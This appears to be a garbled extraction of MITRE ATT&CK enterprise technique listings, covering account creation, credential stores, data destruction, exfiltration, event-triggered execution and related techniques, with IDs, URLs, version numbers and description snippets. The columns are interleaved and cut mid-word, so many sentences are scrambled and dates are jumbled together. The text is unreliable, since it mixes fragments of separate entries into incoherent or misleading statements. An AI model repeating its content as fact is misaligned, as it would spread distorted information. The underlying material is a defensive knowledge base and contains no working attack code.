https://attack.mitre.org/techniques/T1136
14 Decemb Octoberenterprise-2.5 or cloud tenant. In cloud env
T1136.003attack-pat Create AccOnce an adversary
https://attack.mitre.org/techniques/T1136/003
has29created
January14 a cloud
Octoberenterprise-1.6
account, they can then manipulate
Persistencthat account to ens
T1136.002attack-pat Create AccSuch accountshttps://attack.mitre.org/techniques/T1136/002
may be28 used
January01
to establish
Februarenterprise-1.1
secondary credentialed accessPersistenc
that do not require pe
T1136.001attack-pat Create AccSuch accountshttps://attack.mitre.org/techniques/T1136/001
may be28 used
January16
to establish
Octoberenterprise-1.3
secondary credentialed accessPersistenc
that do not require pe
T1543 attack-pat Create or Services, daemons,
https://attack.mitre.org/techniques/T1543
or10
agents
January15
may be Februarenterprise-1.2
created with administrator Persistence
privileges but executed unde
T1543.005attack-pat Create or Note that containers
https://attack.mitre.org/techniques/T1543/005
can
15 Februar16
also be configured
April 20enterprise-1.0
to run as [Systemd Service](https://attack.mitre.o
Persistence, Privilege
T1543.001attack-pat Create or Adversarieshttps://attack.mitre.org/techniques/T1543/001
may install 17aJanuary21
new Launch April
Agent
20enterprise-1.4
that executes at loginPersistence
by placing a .plist file into t
T1543.004attack-pat Create or Additionally,https://attack.mitre.org/techniques/T1543/004
system configuration
17 January30changes
March enterprise-1.2
(such as the installation
Persistence
of third party package ma
T1543.002attack-pat Create or The .servicehttps://attack.mitre.org/techniques/T1543/002
file’s User17directive
January15 canFebruarenterprise-1.5
be used to run service as a specific
Persistence
user, which could resu
T1543.003attack-pat Create or To make detection
https://attack.mitre.org/techniques/T1543/003
17 January11
analysis April 20enterprise-1.5
more challenging, Persistence
malicious services may also incorporate [Masqu
T1555 attack-pat Credential Adversarieshttps://attack.mitre.org/techniques/T1555
11 Februar15 Octoberenterprise-1.2 Credential
T1555.006attack-pat Credential **Note:** https://attack.mitre.org/techniques/T1555/006
this technique 25 Septem15
is distinctOctoberenterprise-1.0
from [Cloud Instance Metadata Credential Access
API](https://attack.mitre.o
T1555.003attack-pat Credential After acquiring
https://attack.mitre.org/techniques/T1555/003
12 Februar15
credentials from web August enterprise-1.2
browsers, Credential
adversaries may attempt to recycle the creden
T1555.001attack-pat Credential Adversaries
Adversarieshttps://attack.mitre.org/techniques/T1555/001
may
may gather 12 user
acquire Februar15 Octoberenterprise-1.1
usercredentials
credentials from
fromKeychain Credential
passwordstorage/memory.
managers For example,
by extracting the cop
the master
T1555.005attack-pat Credential Adversaries https://attack.mitre.org/techniques/T1555/005
may also22 tryJanuary19 August
brute forcing enterprise-1.1
via [Password Credential
Guessing](https://attack.mitre.org/techn
T1555.002attack-pat Credential In OS X prior
https://attack.mitre.org/techniques/T1555/002
12 Februar15
to El Capitan, Octoberenterprise-1.2
users with root access can read plaintext Credential
keychain passwords of log
T1555.004attack-pat Credential Password recovery
https://attack.mitre.org/techniques/T1555/004
23 Novemb
tools may also 15obtain
Octoberenterprise-1.1
plain text passwords from Credential
the Credential Manager.(C
T1485 attack-pat Data Destr In cloud environments, 14adversaries may leverage access to deleteImpact
https://attack.mitre.org/techniques/T1485
March 25 Septementerprise-1.3 cloud storage objects, mach
T1485.001attack-pat Data DestruFor example, in AWS environments, an adversary with the `PutLifecycleConfiguration`
https://attack.mitre.org/techniques/T1485/001
25 Septem16 Octoberenterprise-1.0 Impact permiss
T1132 attack-pat Data EncodAdversarieshttps://attack.mitre.org/techniques/T1132
31 May 20 21 April 20enterprise-1.2 Command a
T1132.002attack-pat Data EncodAdversarie https://attack.mitre.org/techniques/T1132/002
14 March 14 March enterprise-1.0 Command a
T1132.001attack-pat Data EncodAdversarie https://attack.mitre.org/techniques/T1132/001
14 March 03 March enterprise-1.0 Command a
T1486 attack-pat Data EncryIn cloud environments, 15storage
March objects
16 Junewithin
https://attack.mitre.org/techniques/T1486 compromised accounts
20enterprise-1.4 Impact may also be encrypted.
T1565 attack-pat Data ManipThe type ofhttps://attack.mitre.org/techniques/T1565
modification and the02
02 March impact it will have depends on the
Februarenterprise-1.1 Impacttarget application and pro
T1565.003attack-pat Data ManipAdversarieshttps://attack.mitre.org/techniques/T1565/003
may alter02 application
March 15binaries used to display data inImpact
Octoberenterprise-1.2 order to cause runtime man
T1565.001attack-pat Data ManipStored datahttps://attack.mitre.org/techniques/T1565/001
could include 02 March
a variety
26 of
August
file formats,
enterprise-1.1
such as Office Impact
files, databases, stored emai
T1565.002attack-pat Data ManipManipulation https://attack.mitre.org/techniques/T1565/002
may be 02 possible
Marchover 26 August
a network enterprise-1.1
connection or between
Impact system processes wher
T1001 attack-pat Data ObfusAdversarie https://attack.mitre.org/techniques/T1001
31 May 20 07 Octoberenterprise-1.1 Command a
T1001.001attack-pat Data ObfusAdversarieshttps://attack.mitre.org/techniques/T1001/001
15 March 02 Februarenterprise-1.0 Command a
T1001.003attack-pat Data ObfusAdversarieshttps://attack.mitre.org/techniques/T1001/003
may also 15 leverage
Marchlegitimate
09 Octoberenterprise-2.0
protocols to impersonate Command
expecteda web traffic or tru
T1001.002attack-pat Data ObfusAdversarieshttps://attack.mitre.org/techniques/T1001/002
15 March 15 March enterprise-1.0 Command a
T1074 attack-pat Data StageAdversarieshttps://attack.mitre.org/techniques/T1074
may choose 31 May 20 30
to stage Septementerprise-1.4
data from a victim network in aCollection
centralized location prior to
T1074.001attack-pat Data StagedAdversarieshttps://attack.mitre.org/techniques/T1074/001
may also 13 March
stage 26 August
collected data inenterprise-1.1 Collection
various available formats/locations of a system, i
T1074.002attack-pat Data StageBy staging data
https://attack.mitre.org/techniques/T1074/002
on one13system
Marchprior30 Septementerprise-1.1
to Exfiltration, adversaries can Collection
minimize the number of co
T1030 attack-pat Data TransfAn adversarhttps://attack.mitre.org/techniques/T1030
31 May 20 14 July 20 enterprise-1.0 Exfiltration
T1530 attack-pat Data from Adversarieshttps://attack.mitre.org/techniques/T1530
may also 30 August
obtain then14abuse
Octoberenterprise-2.2 Collection
leaked credentials from source repositories, logs, or o
T1602 attack-pat Data from Adversarieshttps://attack.mitre.org/techniques/T1602
may target 19these
October19 April 20enterprise-1.0
repositories in order to collect largeCollection
quantities of sensitive syste
T1602.002attack-pat Data from Adversarieshttps://attack.mitre.org/techniques/T1602/002
can use common20 October17 Februarenterprise-1.0
management Collection
tools and protocols, such as Simple Network Mana
T1602.001attack-pat Data from Adversarieshttps://attack.mitre.org/techniques/T1602/001
may use SNMP queries Octoberenterprise-1.0
19 October22 to collect MIB content directly from SNMP-managed devic
Collection
T1213 attack-pat Data from In some cases, information repositories have
https://attack.mitre.org/techniques/T1213 been
18 April 2028 Octoberenterprise-3.4 improperly secured, typically by unintentio
Collection
T1213.003attack-pat Data from **Note:** This is distinct
* Links to network shares from
and20 [Code Repositories](https://attack.mitre.org/techniques/T1593
https://attack.mitre.org/techniques/T1213/003
11 May 04 Septementerprise-1.2
other internal resources Collection
T1213.001attack-pat Data from https://attack.mitre.org/techniques/T1213/001
14 Februar30 August enterprise-1.1 Collection
T1213.004attack-pat Data from CRM software may be01 hosted on-premises or in the cloud. Information
https://attack.mitre.org/techniques/T1213/004
July 20 17 Octoberenterprise-1.0 stored in these solutio
Collection
In addition to
T1213.005attack-pat Data from * Links to networkexfiltrating data from messaging
https://attack.mitre.org/techniques/T1213/005
30 August
shares applications,
16 Octoberenterprise-1.0
and other internal resources adversaries
Collectionmay leverage data fro
T1213.002attack-pat Data from Adversarieshttps://attack.mitre.org/techniques/T1213/002
may do this 14 using
Februar14 Octoberenterprise-1.1
a [Command Collection
and Scripting Interpreter](https://attack.mitre.org
T1005 attack-pat Data from https://attack.mitre.org/techniques/T1005
31 May 20 12 April 20enterprise-1.6 Collection
T1039 attack-pat Data from Adversarieshttps://attack.mitre.org/techniques/T1039
31 May 20 11 August enterprise-1.4 Collection
T1025 attack-pat Data from Some adversaries
https://attack.mitre.org/techniques/T1025
may31alsoMay use
20[Automated
15 Octoberenterprise-1.2
Collection](https://attack.mitre.org/techniques/T
Collection
T1622 attack-pat Debugger EAdversaries https://attack.mitre.org/techniques/T1622
may use the
01 April
information
2016 April
learned
20enterprise-1.0
from these debugger
Adversaries may modify visual content available internally or externally Defense
checkstoEv
during automated
an enterprise netwd
T1491 attack-pat Defacemen https://attack.mitre.org/techniques/T1491
08 April 2025 March enterprise-1.3 Impact
T1491.002attack-pat Defacement An adversarhttps://attack.mitre.org/techniques/T1491/002
20 Februar25 March enterprise-1.2 Impact
T1491.001attack-pat Defacement An adversarhttps://attack.mitre.org/techniques/T1491/001
20 Februar28 July 20 enterprise-1.1 Impact
T1140 attack-pat DeobfuscatSometimeshttps://attack.mitre.org/techniques/T1140
a user's action
14 Decemb
may be 14required
August enterprise-1.3
to open it for deobfuscation
DefenseorEvdecryption as part
T1610 attack-pat Deploy ConContainershttps://attack.mitre.org/techniques/T1610
can be deployed
29 March by various
15 Octoberenterprise-1.3
means, such as via Docker's Defense
<code>create</code>
Ev and
T1587 attack-pat Develop Cap https://attack.mitre.org/techniques/T1587
As with legitimate 01 October15
development Octoberenterprise-1.1
efforts, different skill sets may beResource
required for developing cap
T1587.002attack-pat Develop Cap https://attack.mitre.org/techniques/T1587/002
Prior to [Code 01 October17 Octoberenterprise-1.1
Signing](https://attack.mitre.org/techniques/T1553/002), Resource adversaries may deve
T1587.003attack-pat Develop Cap https://attack.mitre.org/techniques/T1587/003
After creating a digital01 October16anOctoberenterprise-1.2
certificate, adversary may then install that Resource
certificate (see [Install Di
T1587.004attack-pat Develop CapAdversarieshttps://attack.mitre.org/techniques/T1587/004
01 October15
may use exploits duringApril 20enterprise-1.0
various phases of the adversaryResource
lifecycle (i.e. [Exploit Pub
T1587.001attack-pat Develop CaSome aspects https://attack.mitre.org/techniques/T1587/001
01 October14
of malware development,Januaryenterprise-1.2 Resource may require adver
such as C2 protocol development,
T1652 attack-pat Device DrivOn Linux/macOS,
https://attack.mitre.org/techniques/T1652
28 March
device 04 May
drivers (in 20 enterprise-1.0
the form of kernel modules) mayDiscovery
be visible within `/dev` o
T1006 attack-pat Direct Vol Utilities, such
https://attack.mitre.org/techniques/T1006
31 May exist
as `NinjaCopy`, 20 16to April 20enterprise-2.2
perform Defense Ev
these actions in PowerShell.(Citation: Github Po
T1561 attack-pat Disk Wipe On networkhttps://attack.mitre.org/techniques/T1561
20 Februar20
devices, adversaries mayApril
wipe20enterprise-1.1
configuration files andImpact
other data from the device
T1561.001attack-pat Disk Wipe: To maximize impact on 20the target organization
https://attack.mitre.org/techniques/T1561/001
Februar16 in operations where
April 20enterprise-1.1 network-wide availability
Impact
T1561.002attack-pat Disk Wipe: To maximize impact on 20the target organization,
https://attack.mitre.org/techniques/T1561/002
Februar15 malware designed
Octoberenterprise-1.1 for destroying disk structur
Impact
T1482 attack-pat Domain TruAdversarieshttps://attack.mitre.org/techniques/T1482
14 Februar16 June 20enterprise-1.2 Discovery
T1484 attack-pat Domain or Adversarieshttps://attack.mitre.org/techniques/T1484
may temporarily
07 March modify domain or tenant policy, carry
15 Octoberenterprise-3.1 out a malicious
Defense Eva action(s), a
T1484.001attack-pat Domain or For example, publicly 28
available scripts such as <code>New-GPOImmediateTask</code>
https://attack.mitre.org/techniques/T1484/001
Decemb 23 Septementerprise-1.0 Defense Eva can be
T1484.002attack-pat Domain or An
T adversary may also28add a new25federated identity provider to an
https://attack.mitre.org/techniques/T1484/002
Decemb Septementerprise-2.1 identity
Defense tenant such as Ok
Eva
T1189 attack-pat Drive-by C Adversarieshttps://attack.mitre.org/techniques/T1189
may also 18 useApril
compromised websites to deliver a userInitial
2015 Octoberenterprise-1.6 to a malicious
Acce application d
T1568 attack-pat Dynamic ReAdversarieshttps://attack.mitre.org/techniques/T1568
may use dynamic
10 Marchresolution
11 Marchforenterprise-1.0
the purpose of [Fallback
CommandChannels](https://attack
a
T1568.003attack-pat Dynamic ReOne implementation
https://attack.mitre.org/techniques/T1568/003
of
11[DNS
March Calculation](https://attack.mitre.org/techniques/T1568/003)
27 March enterprise-1.0 Command a is t
T1568.002attack-pat Dynamic ReAdversarieshttps://attack.mitre.org/techniques/T1568/002
may use DGAs
10 Marchfor the15purpose
Octoberenterprise-1.1
of [Fallback Channels](https://attack.mitre.org/tec
Command a
T1568.001attack-pat Dynamic ReIn contrast,https://attack.mitre.org/techniques/T1568/001
the "double-flux"
11 March method
27 March
registers
enterprise-1.0
and de-registers anCommand
address aas part of the DNS
T1114 attack-pat Email ColleAdversarieshttps://attack.mitre.org/techniques/T1114
31 May 20 15 Octoberenterprise-2.6 Collection
T1114.003attack-pat Email ColleIn some environments,
https://attack.mitre.org/techniques/T1114/003
19administrators
Februar14 Octoberenterprise-1.4
may be able to enable email Collection
forwarding rules that oper
T1114.001attack-pat Email ColleOutlook stores
https://attack.mitre.org/techniques/T1114/001
data locally
19 Februar24
in offlineMarch
data files
enterprise-1.0
with an extension of Collection
.ost. Outlook 2010 and late
T1114.002attack-pat Email ColleAdversarieshttps://attack.mitre.org/techniques/T1114/002
19 Februar14 Octoberenterprise-1.3 Collection
T1573 attack-pat Encrypted Adversarieshttps://attack.mitre.org/techniques/T1573
16 March 16 April 20enterprise-1.1 Command a
T1573.002attack-pat Encrypted For efficiency,
https://attack.mitre.org/techniques/T1573/002
16 March(including
many protocols 26 Decemb enterprise-1.1
SSL/TLS) use symmetric Command
cryptography a once a connec
T1573.001attack-pat Encrypted Adversarie
For attackshttps://attack.mitre.org/techniques/T1573/001
attempting16toMarch
saturate 26the
Decemb enterprise-1.1
providing Command
network, see [Network a of Service](http
Denial
T1499 attack-pat Endpoint De https://attack.mitre.org/techniques/T1499
18 April 2015 Octoberenterprise-1.2 Impact
T1499.003attack-pat Endpoint DeAdversarieshttps://attack.mitre.org/techniques/T1499/003
20 Februar15 Octoberenterprise-1.3 Impact
T1499.004attack-pat Endpoint DeAdversarieshttps://attack.mitre.org/techniques/T1499/004
may exploit20 known
Februar15 Octoberenterprise-1.3
or zero-day vulnerabilities to crashImpact
applications and/or system
T1499.001attack-pat Endpoint DeACK floodshttps://attack.mitre.org/techniques/T1499/001
leverage the 20 stateful
Februar30 nature
March of the TCP protocol. A flood
enterprise-1.2 Impactof ACK packets are sent to
T1499.002attack-pat Endpoint DeAnother variation, known as a SSL renegotiation
https://attack.mitre.org/techniques/T1499/002
20 Februar15 Octoberenterprise-1.4 attack, takes advantage
Impact of a protocol feature
T1611 attack-pat Escape to Gaining access
Establishing to the 30
accounts host mayinclude
canMarch
also provide
19 April
thethe
https://attack.mitre.org/techniques/T1611 adversary
20enterprise-1.5
creation with the opportunity
of accounts Privilege
with to achievewhich
emailEproviders, follow-
m
T1585 attack-pat Establish https://attack.mitre.org/techniques/T1585
01 October28 Februarenterprise-1.3 Resource
T1585.003attack-pat Establish Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003)
https://attack.mitre.org/techniques/T1585/003
27 May 20 25 Octoberenterprise-1.1 Resource may also require a
T1585.002attack-pat Establish To decrease the chance of physically tying back
https://attack.mitre.org/techniques/T1585/002
01 October28 Februarenterprise-1.1 operations to themselves,
Resource adversaries may ma
T1585.001attack-pat Establish Once a persona has been developedOctoberenterprise-1.1
an adversary can use it to create
https://attack.mitre.org/techniques/T1585/001
01 October16 Resourceconnections to targets o
T1546 attack-pat Event Trig Since the Switcher:
* Display execution can
22 be proxied Octoberenterprise-1.4
by an account with higher permissions,
https://attack.mitre.org/techniques/T1546
January15
<code>C:\Windows\System32\DisplaySwitch.exe</code> Persistencesuch as SYSTEM or
T1546.008attack-pat Event Trigg* App Switcher:
https://attack.mitre.org/techniques/T1546/008
<code>C:\Windows\System32\AtBroker.exe</code>
24 January21 April 20enterprise-1.1 Persistence
T1546.009attack-pat Event Trig Similar to [Process
https://attack.mitre.org/techniques/T1546/009
Injection](https://attack.mitre.org/techniques/T1055),
24 January10 Novembenterprise-1.0 Persistence this value can be ab
T1546.010attack-pat Event TriggThe AppInithttps://attack.mitre.org/techniques/T1546/010
DLL functionality
24 January21
is disabled
April in
20enterprise-1.1
Windows 8 and later versions
Persistencewhen secure boot is
T1546.011attack-pat Event Trig Utilizing these
https://attack.mitre.org/techniques/T1546/011
shims may
24 January10
allow an adversary
Novembenterprise-1.0
to perform several malicious
Persistence acts such as elevate
T1546.001attack-pat Event TriggThe values https://attack.mitre.org/techniques/T1546/001
of the keys24 listed
January12
are commands
Septementerprise-1.0
that are executed when Persistence
the handler opens the file
T1546.015attack-pat Event Trig Adversarieshttps://attack.mitre.org/techniques/T1546/015
can use the16 COM
Marchsystem 21 April
to insert
20enterprise-1.1
malicious code that Persistence
can be executed in place of
T1546.014attack-pat Event Trig Adversarieshttps://attack.mitre.org/techniques/T1546/014
may abuse 24this
January20
service by April
writing
20enterprise-1.0
a rule to execute commands
Persistence when a defined ev
T1546.012attack-pat Event TriggMalware may https://attack.mitre.org/techniques/T1546/012
also use24IFEO
January10
to [Impair Novemb
Defenses](https://attack.mitre.org/techniques/T1562)
enterprise-1.1 Persistence
T1546.016attack-pat Event TriggFor Windows, https://attack.mitre.org/techniques/T1546/016
27 Septem28
the Microsoft InstallerApril 20enterprise-1.1
services Persistence,
uses `.msi` files to manage Privilege updatin
the installing,
T1546.006attack-pat Event Trig Adversarieshttps://attack.mitre.org/techniques/T1546/006
may modify 24 Mach-O
January20 Aprilheaders
binary 20enterprise-1.0
to load and execute Persistence
malicious dylibs every tim
T1546.007attack-pat Event Trig Adversarieshttps://attack.mitre.org/techniques/T1546/007
24 January20
can use netsh.exe helper April 20enterprise-1.0
DLLs to trigger execution ofPersistence
arbitrary code in a persisten
T1546.013attack-pat Event TriggAn adversary https://attack.mitre.org/techniques/T1546/013
may also24beJanuary20 Octoberenterprise-1.1
able to escalate privileges if a script in aPersistence
PowerShell profile is loaded
T1546.002attack-pat Event Trig Adversarieshttps://attack.mitre.org/techniques/T1546/002
24 January28
can use screensaver July 20toenterprise-1.2
settings maintain persistencePersistence
by setting the screensaver to
T1546.005attack-pat Event TriggAdversarieshttps://attack.mitre.org/techniques/T1546/005
24 to
can use this January24
register March
code to enterprise-1.0
be executed when the Persistence
shell encounters specific in
T1546.017attack-pat Event Trig Adversarieshttps://attack.mitre.org/techniques/T1546/017
may abuse 26the
Septem11 Novembenterprise-1.0
udev subsystem by adding or modifying Persistence
rules in udev rule files to e
T1546.004attack-pat Event TriggFor macOS,https://attack.mitre.org/techniques/T1546/004
24 January25
the functionality of this Septementerprise-2.1
technique is similar but may leveragePersistence zsh, the default shel
T1546.003attack-pat Event Trig WMI subscription execution is proxiedAprilby20enterprise-1.4
the WMI Provider HostPersistence
https://attack.mitre.org/techniques/T1546/003
24 January13 process (WmiPrvSe.exe) and
T1480 attack-pat Execution Adversarieshttps://attack.mitre.org/techniques/T1480
may identify and block June
31 January07 certain user-agents to evade defenses
20enterprise-1.2 Defense Ev and narrow the sco
T1480.001attack-pat Execution Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480),
https://attack.mitre.org/techniques/T1480/001
23 June 2004 May 20 enterprise-1.0 Defense Ev environmental
T1480.002attack-pat Execution GMutex names may be19 hard-coded
Septem28orOctoberenterprise-1.0
dynamically generated usingDefense
https://attack.mitre.org/techniques/T1480/002 a predictable
Evasion algorithm.(Cit
T1048 attack-pat Exfiltratio Many IaaS https://attack.mitre.org/techniques/T1048
and SaaS platforms
31 May 20 (such as Microsoft Exchange, Microsoft
15 Octoberenterprise-1.5 SharePoint, GitHub, and
Exfiltration
T1048.002attack-pat Exfiltratio Network protocols that
15use asymmetric encryption (such as HTTPS/TLS/SSL)
https://attack.mitre.org/techniques/T1048/002
March 15 Octoberenterprise-1.1 Exfiltration often utilize symm
T1048.001attack-pat Exfiltratio Network protocols that
15use asymmetric encryption
https://attack.mitre.org/techniques/T1048/001
March 28 March often utilize symmetric
enterprise-1.0 Exfiltrationencryption once ke
T1048.003attack-pat Exfiltratio Adversarieshttps://attack.mitre.org/techniques/T1048/003
may opt to 15obfuscate
March 12this data,
April without the use of encryption,
20enterprise-2.1 Exfiltrationwithin network pro
T1041 attack-pat Exfiltratio Adversarie https://attack.mitre.org/techniques/T1041
31 May 20 07 April 20enterprise-2.2 Exfiltration
T1011 attack-pat Exfiltrati Adversarieshttps://attack.mitre.org/techniques/T1011
may choose 31 May
to do20 this
11ifSeptementerprise-1.2
they have sufficient access or Exfiltration
proximity, and the connecti
T1011.001attack-pat Exfiltratio Adversarieshttps://attack.mitre.org/techniques/T1011/001
may choose 09 March
to do this 08ifMarch
they haveenterprise-1.1
sufficient access and Exfiltration
proximity. Bluetooth conn
T1052 attack-pat Exfiltratio Adversarieshttps://attack.mitre.org/techniques/T1052
31 May 20 15 Octoberenterprise-1.2 Exfiltration
T1052.001attack-pat Exfiltratio Adversarieshttps://attack.mitre.org/techniques/T1052/001
11 March 15 Octoberenterprise-1.1 Exfiltration
T1567 attack-pat Exfiltratio Web service https://attack.mitre.org/techniques/T1567
providers09also
Marchcommonly15 Octoberenterprise-1.4
use SSL/TLS encryption, giving Exfiltration
adversaries an added lev
T1567.004attack-pat Exfiltratio Access to webhook
https://attack.mitre.org/techniques/T1567/004
20 July 20is 15
endpoints Octoberenterprise-1.1
often over HTTPS, which gives the Exfiltration
adversary an additional lev
T1567.002attack-pat Exfiltratio Examples of https://attack.mitre.org/techniques/T1567/002
09 March
cloud storage services 15 include
Septementerprise-1.2
Dropbox and Google Docs. Exfiltration
Exfiltration to these clo
T1567.001attack-pat Exfiltratio Exfiltrationhttps://attack.mitre.org/techniques/T1567/001
09 March can
to a code repository 15 Septementerprise-1.1
also provide a significant amount Exfiltration
of cover to the adversar
T1567.003attack-pat Exfiltratio **Note:** https://attack.mitre.org/techniques/T1567/003
27 Februar04
This is distinct May 20 enterprise-1.0
from [Exfiltration Exfiltration
to Code Repository](https://attack.mitre.org/techn
T1190 attack-pat Exploit PubFor websites https://attack.mitre.org/techniques/T1190
18 Aprilthe
and databases, 2024 Septementerprise-2.6
OWASP top 10 and CWE top 25 Initial Acce
highlight the most common w
T1203 attack-pat Exploitatio Other applications
https://attack.mitre.org/techniques/T1203
18are
that April 2015 Octoberenterprise-1.4
commonly seen or are part of the software Executiondeployed in a target ne
T1212 attack-pat Exploitatio Exploitationhttps://attack.mitre.org/techniques/T1212
18 April
for credential access2014 mayOctoberenterprise-1.6 Credential
also result in Privilege Escalation depending on the proc
T1211 attack-pat Exploitatio There havehttps://attack.mitre.org/techniques/T1211
also been 18examples
April 2015 of vulnerabilities in public cloud infrastructure
Octoberenterprise-1.4 Defense Ev of SaaS applica
T1068 attack-pat Exploitatio Adversaries may bring a signed vulnerable
https://attack.mitre.org/techniques/T1068 driver
31 May 20 07 April 20enterprise-1.5 onto a compromised machine
Privilege E so that they c
T1210 attack-pat Exploitatio Dependinghttps://attack.mitre.org/techniques/T1210
on the permissions
18 April 2024 levelFebruarenterprise-1.1
of the vulnerable remote service an M
Lateral adversary may achiev
T1133 attack-pat External R Access mayhttps://attack.mitre.org/techniques/T1133
also be gained
31 May through an exposed
20 30 March service that doesn’t
enterprise-2.4 require
Initial Acc authentication. In
T1008 attack-pat Fallback C Adversarieshttps://attack.mitre.org/techniques/T1008
31 May 20 14 July 20 enterprise-1.0 Command a
T1083 attack-pat File and Di Some files and directories may require elevated
https://attack.mitre.org/techniques/T1083
31 May 20 16 April 20enterprise-1.6 or specific user permissions
Discovery to access.
T1222 attack-pat File and Di Adversarieshttps://attack.mitre.org/techniques/T1222
may also 17change permissions
October19 of symbolic links. For example,
Octoberenterprise-2.2 Defense malware
